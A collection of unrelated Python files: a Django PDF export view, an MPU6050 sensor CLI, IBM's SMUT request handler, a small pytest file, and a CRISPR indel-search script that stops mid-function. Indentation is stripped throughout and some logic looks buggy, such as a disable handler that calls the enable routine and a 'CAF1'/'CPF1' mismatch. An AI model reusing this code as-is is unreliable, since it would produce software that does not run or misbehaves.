# "form": form,
# # "author": author,
# # "books": books
# }
# return render(request, "pages/home.html", context)
def request_successful_submit(request):
return render(request, "pages/success.html")
def export_audits_as_pdf(self, request, queryset):
file_name = "prayer_request{0}.pdf".format(time.hour)
response = HttpResponse(content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename="{0}"'.format(file_name)
data = [['request']]
for d in queryset.all():
# datetime_str = str(d.action_time).split('.')[0]
item = [d.request]
data.append(item)
print(d)
print(data)
doc = SimpleDocTemplate(response, pagesize=(21 * inch, 29 * inch))
elements = []
table_data = Table(data)
table_data.setStyle(TableStyle([('ALIGN', (0, 0), (-1, -1), 'LEFT'),
('BOX', (0, 0), (-1, -1), 0.25, colors.black),
("FONTSIZE", (0, 0), (-1, -1), 13)]))
elements.append(table_data)
doc.build(elements)
return response
|
import argparse
import logging
import json
from .transport import CTSocketClient
from .event_trackers import testing, mpu6050
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--client-id', required=True)
subparsers = parser.add_subparsers()
mock_parser = subparsers.add_parser('testing', help='used for autotests')
mock_parser.add_argument('program', nargs='*')
mock_parser.set_defaults(
get_tracker=lambda client, args: testing.TestingEventTracker(client, args.program),
etype=testing.TestingEventTracker.EVENT_TYPE,
)
mpu_parser = subparsers.add_parser('mpu6050')
mpu_parser.add_argument('server_port', nargs='?', type=int,
help="optional TCP server that streams both raw "
"and filtered data to all clients. used for "
"debugging")
mpu_parser.add_argument('--accel-calibration',
help="optional JSON file that contains calibration"
" data for accelerometer")
mpu_parser.set_defaults(
get_tracker=lambda client, args: load_mpu6050_eventtracker(
client, args.server_port, args.accel_calibration
),
etype=mpu6050.Mpu6050EventTracker.EVENT_TYPE,
)
def load_mpu6050_eventtracker(client, server_port, accel_calibration):
if accel_calibration:
with open(accel_calibration) as f:
data = json.load(f)
accel_offsets = data['x_offs'], data['y_offs'], data['z_offs']
else:
log.info('using development accelerometer calibration params')
accel_offsets = 0.42, -1.11, 0.255
return mpu6050.Mpu6050EventTracker(
client,
run_server_at_port=server_port,
accel_offsets=accel_offsets,
)
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
args = parser.parse_args()
def on_config_enabled(etype, params):
tracker.on_config_enabled(etype, params)
def on_config_disabled(etype, params):
tracker.on_config_enabled(etype, params)
client = CTSocketClient(args.client_id, [args.etype],
on_config_enabled, on_config_disabled)
tracker = args.get_tracker(client, args)
client.start()
try:
tracker.run()
except KeyboardInterrupt:
pass
finally:
client.stop()
|
# Request Handle for Systems Management Ultra Thin Layer
#
# Copyright 2017 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import logging.handlers
import shlex
from six import string_types
from smutLayer import changeVM
from smutLayer import cmdVM
from smutLayer import deleteVM
from smutLayer import getHost
from smutLayer import getVM
from smutLayer import makeVM
from smutLayer import migrateVM
from smutLayer import msgs
from smutLayer import smapi
from smutLayer import powerVM
from zvmsdk import log as zvmsdklog
modId = "RQH"
version = '1.0.0' # Version of this script
class ReqHandle(object):
"""
Systems Management Ultra Thin Layer Request Handle.
This class contains all information related to a specific request.
All functions are passed this request handle.
"""
funcHandler = {
'CHANGEVM': [
lambda rh: changeVM.showInvLines(rh),
lambda rh: changeVM.showOperandLines(rh),
lambda rh: changeVM.parseCmdline(rh),
lambda rh: changeVM.doIt(rh)],
'CMDVM': [
lambda rh: cmdVM.showInvLines(rh),
lambda rh: cmdVM.showOperandLines(rh),
lambda rh: cmdVM.parseCmdline(rh),
lambda rh: cmdVM.doIt(rh)],
'DELETEVM': [
lambda rh: deleteVM.showInvLines(rh),
lambda rh: deleteVM.showOperandLines(rh),
lambda rh: deleteVM.parseCmdline(rh),
lambda rh: deleteVM.doIt(rh)],
'GETHOST': [
lambda rh: getHost.showInvLines(rh),
lambda rh: getHost.showOperandLines(rh),
lambda rh: getHost.parseCmdline(rh),
lambda rh: getHost.doIt(rh)],
'GETVM': [
lambda rh: getVM.showInvLines(rh),
lambda rh: getVM.showOperandLines(rh),
lambda rh: getVM.parseCmdline(rh),
lambda rh: getVM.doIt(rh)],
'MAKEVM': [
lambda rh: makeVM.showInvLines(rh),
lambda rh: makeVM.showOperandLines(rh),
lambda rh: makeVM.parseCmdline(rh),
lambda rh: makeVM.doIt(rh)],
'MIGRATEVM': [
lambda rh: migrateVM.showInvLines(rh),
lambda rh: migrateVM.showOperandLines(rh),
lambda rh: migrateVM.parseCmdline(rh),
lambda rh: migrateVM.doIt(rh)],
'POWERVM': [
lambda rh: powerVM.showInvLines(rh),
lambda rh: powerVM.showOperandLines(rh),
lambda rh: powerVM.parseCmdline(rh),
lambda rh: powerVM.doIt(rh)],
'SMAPI': [
lambda rh: smapi.showInvLines(rh),
lambda rh: smapi.showOperandLines(rh),
lambda rh: smapi.parseCmdline(rh),
lambda rh: smapi.doIt(rh)],
}
def __init__(self, **kwArgs):
"""
Constructor
Input:
captureLogs=<True|False>
Enables or disables log capture for all requests.
cmdName=<cmdName>
Name of the command that is using ReqHandle.
This is only used for the function help.
It defaults to "smutCmd.py".
requestId=requestId
Optional request Id
smut=<smutDaemon>
SMUT daemon, it it exists.
"""
self.results = {
'overallRC': 0, # Overall return code for the function, e.g.
# 0 - Everything went ok
# 2 - Something in the IUCVCLNT failed
# 3 - Something in a local vmcp failed
# 4 - Input validation error
# 5 - Miscellaneous processing error
# 8 - SMCLI - SMAPI failure
# 24 - SMCLI - Parsing failure
# 25 - SMCLI - Internal Processing Error
# 99 - Unexpected failure
'rc': 0, # Return code causing the return
'rs': 0, # Reason code causing the return
'errno': 0, # Errno value causing the return
'strError': '', # Error as a string value.
# Normally, this is the errno description.
'response': [], # Response strings
'logEntries': [], # Syslog entries related to this request
}
if 'smut' in kwArgs.keys():
self.daemon = kwArgs['smut'] # SMUT Daemon
# Actual SysLog handling is done in SMUT.
else:
self.daemon = ''
# Set up SysLog handling to be done by ReqHandle
self.logger = logging.getLogger(__name__)
self.logger.setLevel(logging.DEBUG)
self.handler = logging.handlers.SysLogHandler(address = '/dev/log')
self.formatter = (
logging.Formatter('%(module)s.%(funcName)s: %(message)s'))
self.handler.setFormatter(self.formatter)
self.logger.addHandler(self.handler)
if 'cmdName' in kwArgs.keys():
self.cmdName = kwArgs['cmdName']
else:
self.cmdName = 'smutCmd.py'
if 'requestId' in kwArgs.keys():
self.requestId = kwArgs['requestId']
else:
self.requestId = 'REQ_' + hex(id(self))[2:]
# <todo> Need to generate a default request Id
self.function = '' # Function being processed
self.subfunction = '' # Subfunction be processed (optional)
self.userid = '' # Target userid
self.parms = {} # Dictionary of additional parms
self.argPos = 0 # Prep to parse first command line arg
# Capture & return Syslog entries
if 'captureLogs' in kwArgs.keys():
self.captureLogs = kwArgs['captureLogs']
else:
self.captureLogs = False
def driveFunction(self):
"""
Drive the function/subfunction call.
Input:
Self with request filled in.
Output:
Request Handle updated with the results.
Overall return code - 0: successful, non-zero: error
"""
if self.function == 'HELP':
# General help for all functions.
self.printLn("N", "")
self.printLn("N", "Usage:")
self.printLn("N", " python " + self.cmdName + " --help")
for key in sorted(ReqHandle.funcHandler):
ReqHandle.funcHandler[key][0](self)
self.printLn("N", "")
self.printLn("N", "Operand(s):")
for key in sorted(ReqHandle.funcHandler):
ReqHandle.funcHandler[key][1](self)
self.printLn("N", "")
self.updateResults({}, reset=1)
elif self.function == 'VERSION':
# Version of ReqHandle.
self.printLn("N", "Version: " + version)
self.updateResults({}, reset=1)
else:
# Some type of function/subfunction invocation.
if self.function in self.funcHandler:
# Invoke the functions doIt routine to route to the
# appropriate subfunction.
self.funcHandler[self.function][3](self)
else:
# Unrecognized function
msg = msgs.msg['0007'][1] % (modId, self.function)
self.printLn("ES", msg)
self.updateResults(msgs.msg['0007'][0])
return self.results
def parseCmdline(self, requestData):
"""
Parse the request command string.
Input:
Self with request filled in.
Output:
Request Handle updated with the parsed information so that
it is accessible via key/value pairs for later processing.
Return code - 0: successful, non-zero: error
"""
self.printSysLog("Enter ReqHandle.parseCmdline")
# Save the request data based on the type of operand.
if isinstance(requestData, list):
self.requestString = ' '.join(requestData) # Request as a string
self.request = requestData # Request as a list
elif isinstance(requestData, string_types):
self.requestString = requestData # Request as a string
self.request = shlex.split(requestData) # Request as a list
else:
# Request data type is not supported.
msg = msgs.msg['0012'][1] % (modId, type(requestData))
self.printLn("ES", msg)
self.updateResults(msgs.msg['0012'][0])
return self.results
self.totalParms = len(self.request) # Number of parms in the cmd
# Handle the request, parse it or return an error.
if self.totalParms == 0:
# Too few arguments.
msg = msgs.msg['0009'][1] % modId
self.printLn("ES", msg)
self.updateResults(msgs.msg['0009'][0])
elif self.totalParms == 1:
self.function = self.request[0].upper()
if self.function == 'HELP' or self.function == 'VERSION':
pass
else:
# Function is not HELP or VERSION.
msg = msgs.msg['0008'][1] % (modId, self.function)
self.printLn("ES", msg)
self.updateResults(msgs.msg['0008'][0])
else:
# Process based on the function operand.
self.function = self.request[0].upper()
if self.request[0] == 'HELP' or self.request[0] == 'VERSION':
pass
else:
# Handle the function related parms by calling the function
# parser.
if self.function in ReqHandle.funcHandler:
self.funcHandler[self.function][2](self)
else:
# Unrecognized function
msg = msgs.msg['0007'][1] % (modId, self.function)
self.printLn("ES", msg)
self.updateResults(msgs.msg['0007'][0])
self.printSysLog("Exit ReqHandle.parseCmdline, rc: " +
str(self.results['overallRC']))
return self.results
def printLn(self, respType, respString):
"""
Add one or lines of output to the response list.
Input:
Response type: One or more characters indicate type of response.
E - Error message
N - Normal message
S - Output should be logged
W - Warning message
"""
if 'E' in respType:
respString = '(Error) ' + respString
if 'W' in respType:
respString = '(Warning) ' + respString
if 'S' in respType:
self.printSysLog(respString)
self.results['response'] = (self.results['response'] +
respString.splitlines())
return
def printSysLog(self, logString):
"""
Log one or more lines. Optionally, add them to logEntries list.
Input:
Strings to be logged.
"""
if zvmsdklog.LOGGER.getloglevel() <= logging.DEBUG:
# print log only when debug is enabled
if self.daemon == '':
self.logger.debug(self.requestId + ": " + logString)
else:
self.daemon.logger.debug(self.requestId + ": " + logString)
if self.captureLogs is True:
self.results['logEntries'].append(self.requestId + ": " +
logString)
return
def updateResults(self, newResults, **kwArgs):
"""
Update the results related to this request excluding the 'response'
and 'logEntries' values.
We specifically update (if present):
overallRC, rc, rs, errno.
Input:
Dictionary containing the results to be updated or an empty
dictionary the reset keyword was specified.
Reset keyword:
0 - Not a reset. This is the default is reset keyword was not
specified.
1 - Reset failure related items in the result dictionary.
This exclude responses and log entries.
2 - Reset all result items in the result dictionary.
Output:
Request handle is updated with the results.
"""
if 'reset' in kwArgs.keys():
reset = kwArgs['reset']
else:
reset = 0
if reset == 0:
# Not a reset. Set the keys from the provided dictionary.
for key in newResults.keys():
if key == 'response' or key == 'logEntries':
continue
self.results[key] = newResults[key]
elif reset == 1:
# Reset all failure related items.
self.results['overallRC'] = 0
self.results['rc'] = 0
self.results['rs'] = 0
self.results['errno'] = 0
self.results['strError'] = ''
elif reset == 2:
# Reset all results information including any responses and
# log entries.
self.results['overallRC'] = 0
self.results['rc'] = 0
self.results['rs'] = 0
self.results['errno'] = 0
self.results['strError'] = ''
self.results['logEntries'] = ''
self.results['response'] = ''
return
|
import os
from sphinxcontrib.pylit.DataStore import DataStore
def test_default_rootdir():
ds = DataStore()
assert os.path.isdir('.pylit')
ds.delete()
def test__rootdir_specified():
ds = DataStore('test_repo')
assert os.path.isdir('test_repo')
ds.delete()
def test_delete_rootdir():
ds = DataStore('test_repo')
assert os.path.isdir('test_repo')
ds.delete()
assert not os.path.isdir('test_repo')
|
import os, re, sys, logging
import numpy as np
import subprocess as sp
import cPickle as pickle
from pdb import set_trace
sys.path.insert(0, os.path.dirname(os.getcwd()))
from Core.CoreSystem import CoreHash, CoreGotoh
class clsParameter(object):
def __init__(self):
if len(sys.argv) > 1:
self.strForwardFqPath = sys.argv[1]
self.strReverseFqPath = sys.argv[2]
self.strRefFa = sys.argv[3]
self.strPair = sys.argv[4]
self.floOg = float(sys.argv[5])
self.floOe = float(sys.argv[6])
self.intInsertionWin = int(sys.argv[7])
self.intDeletionWin = int(sys.argv[8])
self.strPamType = sys.argv[9].upper() ## Cpf1, Cas9
self.strBarcodePamPos = sys.argv[10] ## PAM - BARCODE type (reverse) or BARCODE - PAM type (forward)
self.intQualCutoff = int(sys.argv[11])
self.strOutputdir = sys.argv[12]
self.strLogPath = sys.argv[13]
self.strEDNAFULL = os.path.abspath('../EDNAFULL')
else:
sManual = """
Usage:
python2.7 ./indel_search_ver1.0.py splitted_input_1.fq splitted_input_2.fq reference.fa
splitted_input_1.fq : forward
splitted_input_2.fq : reverse
Total FASTQ(fq) lines / 4 = remainder 0.
"""
print(sManual)
sys.exit()
class clsFastqOpener(object):
def __init__(self, InstParameter):
self.strForwardFqPath = InstParameter.strForwardFqPath
self.strReverseFqPath = InstParameter.strReverseFqPath
def OpenFastqForward(self):
listFastqForward = []
listStore = []
with open(self.strForwardFqPath) as Fastq1:
for i, strRow in enumerate(Fastq1):
i = i + 1
strRow = strRow.replace('\n', '').upper()
if i % 4 == 1 or i % 4 == 2:
listStore.append(strRow)
elif i % 4 == 0:
listQual = [ord(i) - 33 for i in strRow]
listStore.append(listQual)
listFastqForward.append(tuple(listStore))
listStore = []
return listFastqForward
def OpenFastqReverse(self):
listFastqReverse = []
listStore = []
dictRev = {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A', 'N': 'N'}
#with open('./6_AsD0_2_small_test.fq') as fa_2:
with open(self.strReverseFqPath) as Fastq2:
for i, strRow in enumerate(Fastq2):
i = i + 1
strRow = strRow.replace('\n', '').upper()
if i % 4 == 1:
listStore.append(strRow)
elif i % 4 == 2:
listStore.append(''.join([dictRev[strNucle] for strNucle in strRow[::-1]]))
elif i % 4 == 0:
listQual = [ord(i) - 33 for i in strRow][::-1]
listStore.append(listQual)
listFastqReverse.append(tuple(listStore))
listStore = []
return listFastqReverse
#end1: return
#end: def
class clsIndelSearchParser(object):
def __init__(self, InstParameter):
# index name, constant variable.
self.intNumOfTotal = 0
self.intNumOfIns = 1
self.intNumOfDel = 2
self.intNumofCom = 3
self.intTotalFastq = 4
self.intInsFastq = 5
self.intDelFastq = 6
self.intComFastq = 7
self.intIndelInfo = 8
self.strRefFa = InstParameter.strRefFa
self.floOg = InstParameter.floOg
self.floOe = InstParameter.floOe
self.strEDNAFULL = InstParameter.strEDNAFULL
self.strPamType = InstParameter.strPamType
self.intInsertionWin = InstParameter.intInsertionWin
self.intDeletionWin = InstParameter.intDeletionWin
self.intQualCutoff = InstParameter.intQualCutoff
def SearchBarcodeIndelPosition(self, sBarcode_PAM_pos):
dRef = {}
dResult = {}
with open(self.strRefFa) as Ref:
sBarcode = ""
sTarget_region = ""
intBarcodeLen = 0
for i, sRow in enumerate(Ref):
if i % 2 == 0: ## >CGCTCTACGTAGACA:CTCTATTACTCGCCCCACCTCCCCCAGCCC
sBarcode, sTarget_region, intBarcodeLen = self._SeperateFaHeader(sRow, sBarcode, sTarget_region,
intBarcodeLen, sBarcode_PAM_pos)
elif i % 2 != 0: ## AGCATCGATCAGCTACGATCGATCGATCACTAGCTACGATCGATCA
sRef_seq, iIndel_start_pos, iIndel_end_pos = self._SearchIndelPos(sRow, sBarcode_PAM_pos, sTarget_region)
try:
self._MakeRefAndResultTemplate(sRef_seq, sBarcode, iIndel_start_pos, iIndel_end_pos,
sTarget_region, dRef, dResult)
except ValueError:
continue
assert len(dRef.keys()) == len(dResult.keys())
return dRef, dResult
# end1: return
def _SeperateFaHeader(self, sRow, sBarcode, sTarget_region, intBarcodeLen, sBarcode_PAM_pos):
# barcode target region
# >CGCTCTACGTAGACA:CTCTATTACTCGCCCCACCTCCCCCAGCCC
sBarcode_indel_seq = sRow.strip().replace('\n', '').replace('\r', '').split(':')
sBarcode = sBarcode_indel_seq[0].replace('>', '')
if intBarcodeLen > 0:
assert intBarcodeLen == len(sBarcode), 'All of the barcode lengths must be same.'
intBarcodeLen = len(sBarcode)
sTarget_region = sBarcode_indel_seq[1]
## Reverse the sentence. If it is done, all methods are same before work.
if sBarcode_PAM_pos == 'Reverse':
sBarcode = sBarcode[::-1]
sTarget_region = sTarget_region[::-1]
return (sBarcode, sTarget_region, intBarcodeLen)
def _SearchIndelPos(self, sRow, sBarcode_PAM_pos, sTarget_region):
sRef_seq = sRow.strip().replace('\n', '').replace('\r', '')
if sBarcode_PAM_pos == 'Reverse':
sRef_seq = sRef_seq[::-1]
Seq_matcher = re.compile(r'(?=(%s))' % sTarget_region)
# iIndel_start_pos = sRef_seq.index(sTarget_region) # There is possible to exist two indel.
iIndel_start_pos = Seq_matcher.finditer(sRef_seq)
for i, match in enumerate(iIndel_start_pos):
iIndel_start_pos = match.start()
# print iIndel_start_pos
# print len(sTarget_region)
# print sRef_seq
iIndel_end_pos = iIndel_start_pos + len(sTarget_region) - 1
return (sRef_seq, iIndel_start_pos, iIndel_end_pos)
def _MakeRefAndResultTemplate(self, sRef_seq, sBarcode, iIndel_start_pos,
iIndel_end_pos, sTarget_region, dRef, dResult):
iBarcode_start_pos = sRef_seq.index(sBarcode)
# if iIndel_start_pos <= iBarcode_start_pos:
# print(iIndel_start_pos, iBarcode_start_pos)
# raise IndexError('indel is before barcode')
iBarcode_end_pos = iBarcode_start_pos + len(sBarcode) - 1
sRef_seq_after_barcode = sRef_seq[iBarcode_end_pos + 1:]
# modified. to -1
iIndel_end_next_pos_from_barcode_end = iIndel_end_pos - iBarcode_end_pos - 1
iIndel_start_next_pos_from_barcode_end = iIndel_start_pos - iBarcode_end_pos - 1
# "barcode"-------------*(N) that distance.
# ^ ^ ^
# *NNNN*NNNN
# ^ ^ indel pos, the sequence matcher selects indel event pos front of it.
## Result
dRef[sBarcode] = (sRef_seq, sTarget_region, sRef_seq_after_barcode, iIndel_start_next_pos_from_barcode_end,
iIndel_end_next_pos_from_barcode_end, iIndel_start_pos, iIndel_end_pos) # total matched reads, insertion, deletion, complex
dResult[sBarcode] = [0, 0, 0, 0, [], [], [], [], []]
def SearchIndel(self, lFASTQ=[], dRef = {}, dResult={}, sBarcode_PAM_pos=""):
# lFASTQ : [(seq, qual),(seq, qual)]
# lRef : [(ref_seq, ref_seq_after_barcode, barcode, barcode end pos, indel end pos, indel from barcode),(...)]
# dResult = [# of total, # of ins, # of del, # of com, [total FASTQ], [ins FASTQ], [del FASTQ], [com FASTQ]]
iCount = 0
intBarcodeLen = len(dRef.keys()[0])
#print('intBarcodeLen', intBarcodeLen)
InstGotoh = CoreGotoh(strEDNAFULL=self.strEDNAFULL, floOg=self.floOg, floOe=self.floOe)
for lCol_FASTQ in lFASTQ:
sName = lCol_FASTQ[0]
if sBarcode_PAM_pos == 'Reverse':
sSeq = lCol_FASTQ[1][::-1]
lQual = lCol_FASTQ[2][::-1]
else:
sSeq = lCol_FASTQ[1]
lQual = lCol_FASTQ[2]
assert isinstance(sName, str) and isinstance(sSeq, str) and isinstance(lQual, list)
listSeqWindow = CoreHash.MakeHashTable(sSeq, intBarcodeLen)
iBarcode_matched = 0
iInsert_count = 0
iDelete_count = 0
iComplex_count = 0
intFirstBarcode = 0 ## check whether a barcode is one in a sequence.
for strSeqWindow in listSeqWindow:
if intFirstBarcode == 1: break ## A second barcode in a sequence is not considerable.
try:
lCol_ref, sBarcode, intFirstBarcode = CoreHash.IndexHashTable(dRef, strSeqWindow, intFirstBarcode)
except KeyError:
continue
sRef_seq = lCol_ref[0]
sTarget_region = lCol_ref[1]
iIndel_seq_len = len(sTarget_region)
sRef_seq_after_barcode = lCol_ref[2]
iIndel_start_from_barcode_pos = lCol_ref[3]
iIndel_end_from_barcode_pos = lCol_ref[4]
try:
if self.strPamType == 'CAS9':
iKbp_front_Indel_end = iIndel_end_from_barcode_pos - 6 ## cas9:-6, cpf1:-4
elif self.strPamType == 'CAF1':
iKbp_front_Indel_end = iIndel_end_from_barcode_pos - 4 ## NN(N)*NNN(N)*NNNN
except Exception:
set_trace()
"""
* ^ : iIndel_end_from_barcode_pos
GGCG TCGCTCATGTACCTCCCGT
TATAGTCTGTCATGCGATGGCG---TCGCTCATGTACCTCCCGTTACAGCCACAAAGCAGGA
*
GGCGTC GCTCATGTACCTCCCGT
6 17
"""
## bug fix
if sBarcode == "": continue
(sSeq, iBarcode_matched, sQuery_seq_after_barcode, lQuery_qual_after_barcode) = \
self._CheckBarcodePosAndRemove(sSeq, sBarcode, iBarcode_matched, lQual)
## Alignment Seq to Ref
npGapIncentive = InstGotoh.GapIncentive(sRef_seq_after_barcode)
try:
lResult = InstGotoh.RunCRISPResso2(sQuery_seq_after_barcode.upper(),
sRef_seq_after_barcode.upper(),
npGapIncentive)
except Exception as e:
logging.error(e, exc_info=True)
continue
sQuery_needle_ori = lResult[0]
sRef_needle_ori = lResult[1]
sRef_needle, sQuery_needle = self._TrimRedundantSideAlignment(sRef_needle_ori, sQuery_needle_ori)
lInsertion_in_read, lDeletion_in_read = self._MakeIndelPosInfo(sRef_needle, sQuery_needle)
# print 'sQuery_needle', sQuery_needle
# print 'lInsertion_in_read: onebase', lInsertion_in_read
# print 'lDeletion_in_read: onebase', lDeletion_in_read
# print 'i5bp_front_Indel_end', i5bp_front_Indel_end
# print 'iIndel_end_from_barcode_pos', iIndel_end_from_barcode_pos
lTarget_indel_result = [] # ['20M2I', '23M3D' ...]
iInsert_count = self._TakeInsertionFromAlignment(lInsertion_in_read, iKbp_front_Indel_end, lTarget_indel_result,
iIndel_end_from_barcode_pos, iInsert_count)
iDelete_count = self._TakeDeletionFromAlignment(lDeletion_in_read, iKbp_front_Indel_end, lTarget_indel_result,
iIndel_end_from_barcode_pos, iDelete_count)
if iInsert_count == 1 and iDelete_count == 1:
iComplex_count = 1
iInsert_count = 0
iDelete_count = 0
# """ test set
# print 'sBarcode', sBarcode
# print 'sTarget_region', sTarget_region
# print 'sRef_seq_after_barcode', sRef_seq_after_barcode
# print 'sSeq_after_barcode', sQuery_seq
# print 'iIndel_start_from_barcode_pos', iIndel_start_from_barcode_pos
# print 'iIndel_end_from_barcode_pos', iIndel_end_from_barcode_pos
# """
listResultFASTQ = self._MakeAndStoreQuality(sName, sSeq, lQual, dResult, sBarcode)
"""
iQual_end_pos + 1 is not correct, because the position is like this.
*NNNN*(N)
So, '+ 1' is removed.
Howerver, seqeunce inspects until (N) position. indel is detected front of *(N).
"""
################################################################
#print(lTarget_indel_result)
#set_trace()
# len(sQuery_seq_after_barcode) == len(lQuery_qual_after_barcode)
if np.mean(lQuery_qual_after_barcode[iIndel_start_from_barcode_pos : iIndel_end_from_barcode_pos + 1]) >= self.intQualCutoff: ## Quality cutoff
"""
23M3I
23M is included junk_seq after barcode,
barcorde junk targetseq others
*********ACCCT-------------ACACACACC
so should select target region.
If junk seq is removed by target region seq index pos.
"""
# filter start,
iTarget_start_from_barcode = sRef_seq_after_barcode.index(sTarget_region)
lTrimmed_target_indel_result = self._FixPos(lTarget_indel_result, iTarget_start_from_barcode)
# print 'Check'
# print sRef_seq_after_barcode
# print sQuery_seq_after_barcode
# print lTrimmed_target_indel_result
# print('Trimmed', lTrimmed_target_indel_result)
sRef_seq_after_barcode, sQuery_seq_after_barcode = self._StoreToDictResult(sRef_seq_after_barcode, sQuery_seq_after_barcode, iTarget_start_from_barcode,
dResult, sBarcode, lTrimmed_target_indel_result, sTarget_region, sRef_needle_ori,
sQuery_needle_ori, iInsert_count, iDelete_count, iComplex_count, listResultFASTQ)
else:
iInsert_count = 0
iDelete_count = 0
iComplex_count = 0
# total matched reads, insertion, deletion, complex
dResult[sBarcode][self.intNumOfTotal] += iBarcode_matched
dResult[sBarcode][self.intNumOfIns] += iInsert_count
dResult[sBarcode][self.intNumOfDel] += iDelete_count
dResult[sBarcode][self.intNumofCom] += iComplex_count
iBarcode_matched = 0
iInsert_count = 0
iDelete_count = 0
iComplex_count = 0
#End:for
#END:for
return dResult
def _CheckBarcodePosAndRemove(self, sSeq, sBarcode, iBarcode_matched, lQual):
# Check the barcode pos and remove it.
sSeq = sSeq.replace('\r', '')
iBarcode_start_pos_FASTQ = sSeq.index(sBarcode)
iBarcode_matched += 1
iBarcode_end_pos_FASTQ = iBarcode_start_pos_FASTQ + len(sBarcode) - 1
"""
junk seq target region
ref: AGGAG AGAGAGAGAGA
que: AGGAG AGAGAGAGAGA
But, It doesnt know where is the target region because of existed indels.
So, There is no way not to include it.
"""
# Use this.
sQuery_seq_after_barcode = sSeq[iBarcode_end_pos_FASTQ + 1:]
lQuery_qual_after_barcode = lQual[iBarcode_end_pos_FASTQ:]
return (sSeq, iBarcode_matched, sQuery_seq_after_barcode, lQuery_qual_after_barcode)
def _TrimRedundantSideAlignment(self, sRef_needle_ori, sQuery_needle_ori):
# detach forward ---, backward ---
# e.g. ref ------AAAGGCTACGATCTGCG------
# query AAAAAAAAATCGCTCTCGCTCTCCGATCT
# trimmed ref AAAGGCTACGATCTGCG
# trimmed qeury AAATCGCTCTCGCTCTC
iReal_ref_needle_start = 0
iReal_ref_needle_end = len(sRef_needle_ori)
iRef_needle_len = len(sRef_needle_ori)
for i, sRef_nucle in enumerate(sRef_needle_ori):
if sRef_nucle in ['A', 'C', 'G', 'T']:
iReal_ref_needle_start = i
break
for i, sRef_nucle in enumerate(sRef_needle_ori[::-1]):
if sRef_nucle in ['A', 'C', 'G', 'T']:
iReal_ref_needle_end = iRef_needle_len - (i + 1)
# forward 0 1 2 len : 3
# reverse 2 1 0, len - (2 + 1) = 0
break
sRef_needle = sRef_needle_ori[iReal_ref_needle_start:iReal_ref_needle_end + 1]
if iReal_ref_needle_start:
sQuery_needle = sQuery_needle_ori[:iReal_ref_needle_end]
sQuery_needle = sQuery_needle_ori[:len(sRef_needle)]
# detaching completion
return (sRef_needle, sQuery_needle)
def _MakeIndelPosInfo(self, sRef_needle, sQuery_needle):
# indel info making.
iNeedle_match_pos_ref = 0
iNeedle_match_pos_query = 0
iNeedle_insertion = 0
iNeedle_deletion = 0
lInsertion_in_read = [] # insertion result [[100, 1], [119, 13]]
lDeletion_in_read = [] # deletion result [[97, 1], [102, 3]]
# print 'sRef_needle', sRef_needle
# print 'sQuery_needle', sQuery_needle
for i, (sRef_nucle, sQuery_nucle) in enumerate(zip(sRef_needle, sQuery_needle)):
if sRef_nucle == '-':
iNeedle_insertion += 1
if sQuery_nucle == '-':
iNeedle_deletion += 1
if sRef_nucle in ['A', 'C', 'G', 'T']:
if iNeedle_insertion:
lInsertion_in_read.append([iNeedle_match_pos_ref, iNeedle_insertion])
iNeedle_insertion = 0
iNeedle_match_pos_ref += 1
if sQuery_nucle in ['A', 'C', 'G', 'T']:
if iNeedle_deletion:
lDeletion_in_read.append([iNeedle_match_pos_query, iNeedle_deletion])
iNeedle_match_pos_query += iNeedle_deletion
iNeedle_deletion = 0
iNeedle_match_pos_query += 1
# print 'sRef_needle', sRef_needle
return (lInsertion_in_read, lDeletion_in_read)
def _TakeInsertionFromAlignment(self, lInsertion_in_read, iKbp_front_Indel_end, lTarget_indel_result,
iIndel_end_from_barcode_pos, iInsert_count):
"""
ins case
...............................NNNNNNNNNNNNNN....NNNNNNNNNNNNNNNNNNN*NNNNNAGCTT
"""
for iMatch_pos, iInsertion_pos in lInsertion_in_read:
if self.strPamType == 'CAS9':
# if i5bp_front_Indel_end == iMatch_pos -1 or iIndel_end_from_barcode_pos == iMatch_pos -1: # iMatch_pos is one base # original ver
if iKbp_front_Indel_end - self.intInsertionWin <= iMatch_pos - 1 <= iKbp_front_Indel_end + self.intInsertionWin: # iMatch_pos is one base
iInsert_count = 1
lTarget_indel_result.append(str(iMatch_pos) + 'M' + str(iInsertion_pos) + 'I')
elif self.strPamType == 'CPF1':
if iKbp_front_Indel_end - self.intInsertionWin <= iMatch_pos - 1 <= iKbp_front_Indel_end + self.intInsertionWin or \
iIndel_end_from_barcode_pos - self.intInsertionWin <= iMatch_pos - 1 <= iIndel_end_from_barcode_pos + self.intInsertionWin: # iMatch_pos is one base
iInsert_count = 1
lTarget_indel_result.append(str(iMatch_pos) + 'M' + str(iInsertion_pos) + 'I')
return iInsert_count
def _TakeDeletionFromAlignment(self, lDeletion_in_read, iKbp_front_Indel_end, lTarget_indel_result,
iIndel_end_from_barcode_pos, iDelete_count):
"""
del case 1
...............................NNNNNNNNNNNNNN....NNNNNNNNNNNNNNNNNNNNN**NNNAGCTT
del case 2
...............................NNNNNNNNNNNNNN....NNNNNNNNNNNNNNNNNNNNN**NNNNNCTT
"""
for iMatch_pos, iDeletion_pos in lDeletion_in_read:
"""
Insertion: 30M3I
^
ACGT---ACGT
ACGTTTTACGT -> check this seq
Insertion just check two position
Deletion: 30M3D
^
ACGTTTTACGT
ACGT---ACGT -> check this seq
But deletion has to includes overlap deletion.
"""
if self.strPamType == 'CAS9':
if (iMatch_pos - self.intDeletionWin - 1 <= iKbp_front_Indel_end and iKbp_front_Indel_end < (iMatch_pos + iDeletion_pos + self.intDeletionWin - 1)):
iDelete_count = 1
lTarget_indel_result.append(str(iMatch_pos) + 'M' + str(iDeletion_pos) + 'D')
elif self.strPamType == 'CPF1':
if (iMatch_pos - self.intDeletionWin - 1 <= iKbp_front_Indel_end and iKbp_front_Indel_end < (iMatch_pos + iDeletion_pos + self.intDeletionWin - 1)) or \
(iMatch_pos - self.intDeletionWin - 1 <= iIndel_end_from_barcode_pos and iIndel_end_from_barcode_pos < (iMatch_pos + iDeletion_pos + self.intDeletionWin - 1)):
